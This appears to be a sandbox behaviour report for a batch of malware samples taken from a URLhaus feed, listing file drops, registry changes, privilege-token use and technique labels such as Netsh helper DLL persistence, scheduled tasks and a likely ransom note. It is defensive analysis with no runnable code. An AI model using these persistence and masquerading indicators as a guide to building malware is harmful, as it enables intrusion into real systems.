File created C:\Program Files (x86)\seetrol\client\105\dfmirage.inf C:\Program Files (x86)\seetrol\client\SeetrolClient.exe N/A
File created C:\Program Files (x86)\seetrol\client\sas.dll C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\ClientRun.exe N/A
File created C:\Program Files (x86)\seetrol\client\SeetrolMyService.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\ClientRun.exe N/A
File created C:\Program Files (x86)\seetrol\client\SeetrolClient.cfg C:\Program Files (x86)\seetrol\client\SeetrolClient.exe N/A
File created C:\Program Files (x86)\seetrol\client\MirrInst64.exe C:\Program Files (x86)\seetrol\client\SeetrolClient.exe N/A
File created C:\Program Files (x86)\seetrol\client\068\dfmirage.cat C:\Program Files (x86)\seetrol\client\SeetrolClient.exe N/A
File created C:\Program Files (x86)\seetrol\client\068\dfmirage.inf C:\Program Files (x86)\seetrol\client\SeetrolClient.exe N/A
File created C:\Program Files (x86)\seetrol\client\105\x86\dfmirage.sys C:\Program Files (x86)\seetrol\client\SeetrolClient.exe N/A
File created C:\Program Files (x86)\seetrol\client\SeetrolClient.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\ClientRun.exe N/A
File created C:\Program Files (x86)\seetrol\client\sthooks.dll C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\ClientRun.exe N/A
File created C:\Program Files (x86)\seetrol\client\STUpdate.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\ClientRun.exe N/A
File created C:\Program Files (x86)\seetrol\client\105\x64\dfmirage.sys C:\Program Files (x86)\seetrol\client\SeetrolClient.exe N/A
File created C:\Program Files (x86)\seetrol\client\Seetrol_Clt.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\ClientRun.exe N/A
File created C:\Program Files (x86)\seetrol\client\mdph.tmp C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\ClientRun.exe N/A
File created C:\Program Files (x86)\seetrol\client\MirrInst32.exe C:\Program Files (x86)\seetrol\client\SeetrolClient.exe N/A
File created C:\Program Files (x86)\seetrol\client\Install.cmd C:\Program Files (x86)\seetrol\client\SeetrolClient.exe N/A
File created C:\Program Files (x86)\seetrol\client\105\dfmirage.cat C:\Program Files (x86)\seetrol\client\SeetrolClient.exe N/A
File created C:\Program Files (x86)\seetrol\client\105\x86\dfmirage.dll C:\Program Files (x86)\seetrol\client\SeetrolClient.exe N/A

Access Token Manipulation: Create Process with Token

defense_evasion privilege_escalation
Description Indicator Process Target
N/A N/A C:\Windows\system32\mshta.exe N/A

Browser Information Discovery

discovery

Detects Pyinstaller

pyinstaller
Description Indicator Process Target
N/A N/A N/A N/A

Enumerates physical storage devices

Event Triggered Execution: Netsh Helper DLL

persistence privilege_escalation
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Downloads\UrlHausFiles\TPB-1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Downloads\UrlHausFiles\AA_v3.5.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Music\Windows Security Health Host.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Downloads\UrlHausFiles\pornhub_downloader.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Downloads\UrlHausFiles\keygen.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\PING.EXE N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Downloads\UrlHausFiles\shttpsr_mg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\timeout.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\PING.EXE N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Downloads\UrlHausFiles\AA_v3.5.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Downloads\UrlHausFiles\PCclear_Eng_mini.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Downloads\UrlHausFiles\file.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\ipconfig.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Downloads\UrlHausFiles\gvndxfghs.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Downloads\UrlHausFiles\gvndxfghs.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Downloads\UrlHausFiles\AA_v3.5.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\PING.EXE N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\seetrol\client\SeetrolClient.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Downloads\UrlHausFiles\imgdisk.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Downloads\UrlHausFiles\SecurityHealthService.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Downloads\UrlHausFiles\ew.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Downloads\UrlHausFiles\dsd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\svchost.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Downloads\UrlHausFiles\unik.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Downloads\UrlHausFiles\client.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Downloads\UrlHausFiles\9758xBqgE1azKnB.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Downloads\UrlHausFiles\hack1226.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Downloads\UrlHausFiles\zke-ascv.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\DOWNLO~1\URLHAU~1\PORNHU~1.EXE N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Downloads\UrlHausFiles\inst77player_1.0.0.1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\Downloads\UrlHausFiles\%EC%9D%B8%ED%84%B0%EB%84%B7_%EC%A2%85%EB%9F%89%EC%A0%9C_%ED%85%8C%EC%8A%A4%ED%8A%B8-cksal16.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\PING.EXE N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\ClientRun.exe N/A

System Network Configuration Discovery: Internet Connection Discovery

discovery
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A

NSIS installer

installer
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Users\Admin\Downloads\UrlHausFiles\TPB-1.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Users\Admin\Downloads\UrlHausFiles\TPB-1.exe N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Delays execution with timeout.exe

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Gathers network information

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\ipconfig.exe N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\ActiveX Compatibility\{625F76EE-DE78-428A-8B2D-96F06F3707A5} C:\Users\Admin\Downloads\UrlHausFiles\PCclear_Eng_mini.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\ActiveX Compatibility\{625F76EE-DE78-428A-8B2D-96F06F3707A5}\Compatibility Flags = "1024" C:\Users\Admin\Downloads\UrlHausFiles\PCclear_Eng_mini.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Ammyy\Admin C:\Users\Admin\Downloads\UrlHausFiles\AA_v3.5.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE C:\Users\Admin\Downloads\UrlHausFiles\AA_v3.5.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Ammyy\Admin C:\Users\Admin\Downloads\UrlHausFiles\AA_v3.5.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\Software\Ammyy\Admin\hr3 = d20de67af3c8613f60eb5e1827463522feaf35eeeeef2f258ba3d2055017810f076911ebb8d1afea1c84c804050f931dee18e328257912f1081cf2c7f12d401526cd10c6cf962825921bdf C:\Users\Admin\Downloads\UrlHausFiles\AA_v3.5.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133772324680587466" C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" C:\Users\Admin\Downloads\UrlHausFiles\AA_v3.5.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" C:\Users\Admin\Downloads\UrlHausFiles\AA_v3.5.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\Software\Ammyy\Admin\hr = 537d567366087c6658524c17525304175142701eb36b C:\Users\Admin\Downloads\UrlHausFiles\AA_v3.5.exe N/A
Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix C:\Users\Admin\Downloads\UrlHausFiles\AA_v3.5.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Ammyy C:\Users\Admin\Downloads\UrlHausFiles\AA_v3.5.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\take3.exe N/A

Opens file in notepad (likely ransom note)

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\System32\notepad.exe N/A

Runs ping.exe

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\Downloads\UrlHausFiles\TPB-1.exe N/A
N/A N/A C:\Users\Admin\Downloads\UrlHausFiles\TPB-1.exe N/A
N/A N/A C:\Users\Admin\Downloads\UrlHausFiles\TPB-1.exe N/A
N/A N/A C:\Users\Admin\Downloads\UrlHausFiles\TPB-1.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Users\Admin\Downloads\UrlHausFiles\SecurityHealthService.exe N/A
N/A N/A C:\Users\Admin\Downloads\UrlHausFiles\SecurityHealthService.exe N/A
N/A N/A C:\Users\Admin\Downloads\UrlHausFiles\SecurityHealthService.exe N/A
N/A N/A C:\Users\Admin\Downloads\UrlHausFiles\SecurityHealthService.exe N/A
N/A N/A C:\Users\Admin\Downloads\UrlHausFiles\SecurityHealthService.exe N/A
N/A N/A C:\Users\Admin\Downloads\UrlHausFiles\SecurityHealthService.exe N/A
N/A N/A C:\Users\Admin\Downloads\UrlHausFiles\SecurityHealthService.exe N/A
N/A N/A C:\Users\Admin\Downloads\UrlHausFiles\SecurityHealthService.exe N/A
N/A N/A C:\Users\Admin\Downloads\UrlHausFiles\SecurityHealthService.exe N/A
N/A N/A C:\Users\Admin\Downloads\UrlHausFiles\SecurityHealthService.exe N/A
N/A N/A C:\Users\Admin\Downloads\UrlHausFiles\SecurityHealthService.exe N/A
N/A N/A C:\Users\Admin\Downloads\UrlHausFiles\SecurityHealthService.exe N/A
N/A N/A C:\Users\Admin\Downloads\UrlHausFiles\SecurityHealthService.exe N/A
N/A N/A C:\Users\Admin\Downloads\UrlHausFiles\SecurityHealthService.exe N/A
N/A N/A C:\Users\Admin\Downloads\UrlHausFiles\SecurityHealthService.exe N/A
N/A N/A C:\Users\Admin\Downloads\UrlHausFiles\SecurityHealthService.exe N/A
N/A N/A C:\Users\Admin\Downloads\UrlHausFiles\SecurityHealthService.exe N/A
N/A N/A C:\Users\Admin\Downloads\UrlHausFiles\SecurityHealthService.exe N/A
N/A N/A C:\Users\Admin\Downloads\UrlHausFiles\SecurityHealthService.exe N/A
N/A N/A C:\Users\Admin\Downloads\UrlHausFiles\SecurityHealthService.exe N/A
N/A N/A C:\Users\Admin\Downloads\UrlHausFiles\SecurityHealthService.exe N/A
N/A N/A C:\Users\Admin\Downloads\UrlHausFiles\SecurityHealthService.exe N/A
N/A N/A C:\Users\Admin\Downloads\UrlHausFiles\SecurityHealthService.exe N/A
N/A N/A C:\Users\Admin\Downloads\UrlHausFiles\SecurityHealthService.exe N/A
N/A N/A C:\Users\Admin\Downloads\UrlHausFiles\SecurityHealthService.exe N/A
N/A N/A C:\Users\Admin\Downloads\UrlHausFiles\SecurityHealthService.exe N/A
N/A N/A C:\Users\Admin\Downloads\UrlHausFiles\SecurityHealthService.exe N/A
N/A N/A C:\Users\Admin\Downloads\UrlHausFiles\TPB-1.exe N/A
N/A N/A C:\Users\Admin\Downloads\UrlHausFiles\TPB-1.exe N/A
N/A N/A C:\Users\Admin\Downloads\UrlHausFiles\unik.exe N/A
N/A N/A C:\Users\Admin\Downloads\UrlHausFiles\unik.exe N/A
N/A N/A C:\Users\Admin\Downloads\UrlHausFiles\TPB-1.exe N/A
N/A N/A C:\Users\Admin\Downloads\UrlHausFiles\TPB-1.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Users\Admin\Downloads\UrlHausFiles\9758xBqgE1azKnB.exe N/A
N/A N/A C:\Users\Admin\Downloads\UrlHausFiles\9758xBqgE1azKnB.exe N/A
N/A N/A C:\Users\Admin\Downloads\UrlHausFiles\9758xBqgE1azKnB.exe N/A
N/A N/A C:\Users\Admin\Downloads\UrlHausFiles\9758xBqgE1azKnB.exe N/A
N/A N/A C:\Users\Admin\Downloads\UrlHausFiles\TPB-1.exe N/A
N/A N/A C:\Users\Admin\Downloads\UrlHausFiles\TPB-1.exe N/A
N/A N/A C:\Users\Admin\Downloads\UrlHausFiles\9758xBqgE1azKnB.exe N/A
N/A N/A C:\Users\Admin\Music\Windows Security Health Host.exe N/A
N/A N/A C:\Users\Admin\Music\Windows Security Health Host.exe N/A
N/A N/A C:\Users\Admin\Music\Windows Security Health Host.exe N/A
N/A N/A C:\Users\Admin\Music\Windows Security Health Host.exe N/A
N/A N/A C:\Users\Admin\Downloads\UrlHausFiles\9758xBqgE1azKnB.exe N/A
N/A N/A C:\Users\Admin\Downloads\UrlHausFiles\9758xBqgE1azKnB.exe N/A
N/A N/A C:\Users\Admin\Downloads\UrlHausFiles\9758xBqgE1azKnB.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\Downloads\UrlHausFiles\gvndxfghs.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\Downloads\UrlHausFiles\SecurityHealthService.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\svchost.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Roaming\svchost.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Roaming\svchost.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Roaming\svchost.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Roaming\svchost.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\Downloads\UrlHausFiles\9758xBqgE1azKnB.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\Downloads\UrlHausFiles\Winsvc.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Roaming\svchost.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Roaming\svchost.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\Music\Windows Security Health Host.exe N/A
Token: 33 N/A C:\Windows\system32\AUDIODG.EXE N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\system32\AUDIODG.EXE N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\Downloads\UrlHausFiles\gvndxfghs.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Roaming\svchost.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Roaming\svchost.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\Downloads\UrlHausFiles\Winsvc.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Roaming\svchost.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Roaming\svchost.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\ClientRun.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\ClientRun.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\ClientRun.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\Downloads\UrlHausFiles\Registry.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\SubDir\Runtime Broker.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\Downloads\UrlHausFiles\AA_v3.5.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
